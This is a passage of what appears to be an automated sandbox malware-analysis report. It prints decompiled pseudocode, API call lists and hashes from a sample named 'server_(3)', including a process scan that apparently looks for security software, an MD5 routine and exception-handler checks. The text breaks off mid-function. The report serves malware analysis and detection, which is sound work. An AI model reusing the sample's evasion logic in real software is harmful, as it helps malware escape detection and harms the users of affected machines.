          0x005e1f07
          0x005e1f1d
          0x005e1f09
          0x005e1f09
          0x005e1f16
          0x005e1f16
          0x005e1f21
          0x005e1f34
          0x005e1f34
          0x00000000
          0x005e1f23
          0x005e1f23
          0x005e1f2d
          0x00000000
          0x005e1f3e
          0x005e1f3e
          0x005e1f40
          0x005e1f56
          0x005e1f42
          0x005e1f42
          0x005e1f4f
          0x005e1f4f
          0x005e1f5a
          0x005e1f5c
          0x005e1f5f
          0x005e1f60
          0x005e1f67
          0x005e1f69
          0x005e1f6a
          0x005e1f6a
          0x005e1f67
          0x005e1f71
          0x005e1f87
          0x005e1f73
          0x005e1f73
          0x005e1f80
          0x005e1f80
          0x005e1f8b
          0x005e1f99
          0x005e1fa3
          0x005e1fa3
          0x005e1fab
          0x005e1fc1
          0x005e1fad
          0x005e1fad
          0x005e1fba
          0x005e1fba
          0x005e1fc5
          0x005e1fd8
          0x005e1fd8
          0x005e1fdd
          0x005e1fe3
          0x00000000
          0x005e1fc7
          0x005e1fca
          0x005e1fcf
          0x005e1fd6
          0x005e1fe8
          0x005e1fea
          0x005e2000
          0x005e1fec
          0x005e1fec
          0x005e1ff9
          0x005e1ff9
          0x005e2004
          0x005e2010
          0x005e2015
          0x005e2015
          0x005e2006
          0x005e2009
          0x005e2009
          0x005e2023
          0x005e2028
          0x005e202e
          0x00000000
          0x005e2031
          0x00000000
          0x005e1fd6
          0x005e1fc5
          0x005e1f2d
          0x005e1f21

          APIs
          • StrToIntExA.SHLWAPI(00000000,00000000,?,005EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 005E1E2F
          • StrToIntExA.SHLWAPI(00000000,00000000,?,005EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 005E1E61
          • StrToIntExA.SHLWAPI(00000000,00000000,?,005EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 005E1E93
          • StrToIntExA.SHLWAPI(00000000,00000000,?,005EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 005E1EC5
          • StrToIntExA.SHLWAPI(00000000,00000000,?,005EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 005E1EF7
          • StrToIntExA.SHLWAPI(00000000,00000000,?,005EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 005E1F29
          • HeapFree.KERNEL32(00000000,?,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 005E2028
          • HeapFree.KERNEL32(00000000,?,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 005E203C
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: FreeHeap
          • String ID: Uqt
          • API String ID: 3298025750-2320327147
          • Opcode ID: ee1d2a4a3f341f7814fccbfe692c699c8dacd8f6ceccde03962051ff6d86aaeb
          • Instruction ID: 707ec25ce9b0caff8a59aa2249d9e04bebd86961644d81ccbdd1a28855783e1a
          • Opcode Fuzzy Hash: ee1d2a4a3f341f7814fccbfe692c699c8dacd8f6ceccde03962051ff6d86aaeb
          • Instruction Fuzzy Hash: 2381AD70A00AC4ABC718DBB68DC8D5F7EBEBB987007240D25F581DB214EA35ED489765
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E30D5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41processCOMMON
          Download Yara Rule
          C-Code - Quality: 68%
          			E005E30D5() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x5ea348; // 0x25dd5a8
						_t2 = _t9 + 0x5ebe88; // 0x73617661
						_push( &_v264);
						if( *0x5ea12c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









          0x005e30e0
          0x005e30ea
          0x005e30ee
          0x005e30f8
          0x005e3129
          0x005e30ff
          0x005e3104
          0x005e3111
          0x005e311a
          0x005e3131
          0x005e311c
          0x005e3124
          0x00000000
          0x005e3124
          0x005e3132
          0x005e3133
          0x00000000
          0x005e3133
          0x00000000
          0x005e312d
          0x005e3139
          0x005e313e

          APIs
          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005E30E5
          • Process32First.KERNEL32(00000000,?), ref: 005E30F8
          • Process32Next.KERNEL32(00000000,?), ref: 005E3124
          • CloseHandle.KERNEL32(00000000), ref: 005E3133
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
          • String ID: |}^
          • API String ID: 420147892-3035116398
          • Opcode ID: 8a3260b822fcfe468816a7bdccd7ae35da91586d9b8031c4962d0e7da5b8fc5f
          • Instruction ID: 4c5f1bddf9a003fecdb7296a3081cdde1c23197c631027b0cfb45e1be4d7ffe8
          • Opcode Fuzzy Hash: 8a3260b822fcfe468816a7bdccd7ae35da91586d9b8031c4962d0e7da5b8fc5f
          • Instruction Fuzzy Hash: FFF096325001E45AD72CA7779C4DEEB3AACFFD5350F010065FAC5C3001EA20DB49D6A2
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00401D68 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E00401D68() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x404170;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x40417c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x40416c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x404168 = _t5;
						 *0x404170 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x404164 = _t6;
						if(_t6 == 0) {
							 *0x404164 =  *0x404164 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}










          0x00401d69
          0x00401d77
          0x00401d7d
          0x00401d84
          0x00401ddb
          0x00401ddb
          0x00401d86
          0x00401d8e
          0x00401d9b
          0x00401d9b
          0x00401dd7
          0x00401dd9
          0x00000000
          0x00000000
          0x00000000
          0x00401d90
          0x00401d97
          0x00401d9d
          0x00401d9d
          0x00401da2
          0x00401db0
          0x00401db5
          0x00401dbb
          0x00401dc1
          0x00401dc8
          0x00401dca
          0x00401dca
          0x00401dd4
          0x00401d99
          0x00401d99
          0x00000000
          0x00401d99
          0x00401d97

          APIs
          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
          • GetVersion.KERNEL32 ref: 00401D86
          • GetCurrentProcessId.KERNEL32 ref: 00401DA2
          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: Process$CreateCurrentEventOpenVersion
          • String ID:
          • API String ID: 845504543-0
          • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
          • Instruction ID: a5005e0615366c288a960c89f9170266babf83a3c5a8d8e9540ac284067a1926
          • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
          • Instruction Fuzzy Hash: 79F0AFB05813009BE7509F78BE0DB563F64AB95712F000036E601FA2F8D7709982CB5C
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005C092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5c0000_server_(3).jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: .$GetProcAddress.$l
          • API String ID: 0-2784972518
          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
          • Instruction ID: 98e2855c91b7d6d13c1aaee1a987c8e3c3f73c4769feff650d4183344e91fb74
          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
          • Instruction Fuzzy Hash: DC3159B6900609DFDB10CF99C884BAEBBF9FF48324F24504AD841A7351D771EA45CBA4
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E16DF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 611COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 49%
          			E005E16DF(void* __ecx, void* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t1 =  &_a4; // 0x5e544b
				_t226 =  *_t1;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t683 =  *(_t226 + 4);
				_t402 =  *(_t226 + 8);
				_t349 =  *(_t226 + 0xc);
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}


































































































          0x005e16e2
          0x005e16e2
          0x005e16ed
          0x005e16f0
          0x005e16f3
          0x005e16f4
          0x005e1712
          0x005e1714
          0x005e1717
          0x005e171a
          0x005e171a
          0x005e171d
          0x005e1720
          0x005e1723
          0x005e1740
          0x005e1743
          0x005e1759
          0x005e175c
          0x005e1776
          0x005e1779
          0x005e178f
          0x005e1792
          0x005e1794
          0x005e17ac
          0x005e17af
          0x005e17b2
          0x005e17ca
          0x005e17cd
          0x005e17e7
          0x005e17ea
          0x005e1800
          0x005e1803
          0x005e1805
          0x005e181d
          0x005e1822
          0x005e1825
          0x005e183b
          0x005e183e
          0x005e1858
          0x005e185b
          0x005e1871
          0x005e1874
          0x005e1876
          0x005e1891
          0x005e1894
          0x005e18ab
          0x005e18ae
          0x005e18b2
          0x005e18cb
          0x005e18ce
          0x005e18d0
          0x005e18d3
          0x005e18ee
          0x005e18f1
          0x005e190a
          0x005e190d
          0x005e191d
          0x005e1920
          0x005e1938
          0x005e193b
          0x005e1955
          0x005e1958
          0x005e1970
          0x005e1973
          0x005e1989
          0x005e198c
          0x005e19a4
          0x005e19a7
          0x005e19bf
          0x005e19c2
          0x005e19dc
          0x005e19df
          0x005e19f5
          0x005e19f8
          0x005e1a10
          0x005e1a13
          0x005e1a2d
          0x005e1a30
          0x005e1a48
          0x005e1a4b
          0x005e1a61
          0x005e1a64
          0x005e1a7c
          0x005e1a7f
          0x005e1a97
          0x005e1a9a
          0x005e1aac
          0x005e1aaf
          0x005e1ac1
          0x005e1ac4
          0x005e1ad6
          0x005e1ad9
          0x005e1add
          0x005e1aed
          0x005e1af0
          0x005e1afe
          0x005e1b01
          0x005e1b13
          0x005e1b16
          0x005e1b2a
          0x005e1b2d
          0x005e1b2f
          0x005e1b3f
          0x005e1b42
          0x005e1b54
          0x005e1b57
          0x005e1b65
          0x005e1b68
          0x005e1b7a
          0x005e1b7d
          0x005e1b81
          0x005e1b91
          0x005e1b94
          0x005e1ba6
          0x005e1ba9
          0x005e1bb7
          0x005e1bba
          0x005e1bcc
          0x005e1bcf
          0x005e1be1
          0x005e1be4
          0x005e1bf8
          0x005e1bfb
          0x005e1c0f
          0x005e1c12
          0x005e1c26
          0x005e1c29
          0x005e1c3d
          0x005e1c40
          0x005e1c54
          0x005e1c57
          0x005e1c6b
          0x005e1c70
          0x005e1c82
          0x005e1c85
          0x005e1c99
          0x005e1c9c
          0x005e1cb0
          0x005e1cb3
          0x005e1cc9
          0x005e1ccc
          0x005e1ce0
          0x005e1ce3
          0x005e1cf5
          0x005e1cf8
          0x005e1d0c
          0x005e1d0f
          0x005e1d23
          0x005e1d26
          0x005e1d3a
          0x005e1d43
          0x005e1d46
          0x005e1d4f
          0x005e1d58
          0x005e1d60
          0x005e1d68
          0x005e1d72
          0x005e1d87

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: memset
          • String ID: KT^
          • API String ID: 2221118986-3515506576
          • Opcode ID: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
          • Instruction ID: 62c042aeefe34926a8bbac29518cab92c380afa2b0b92ddb310d00847ed4ce99
          • Opcode Fuzzy Hash: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
          • Instruction Fuzzy Hash: 0A22857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E8551 Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E005E8551(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x5ea380; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x5ea3c8 = 1;
										__eflags =  *0x5ea3c8;
										if( *0x5ea3c8 != 0) {
											goto L60;
										}
										_t84 =  *0x5ea380; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x5ea3c8 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
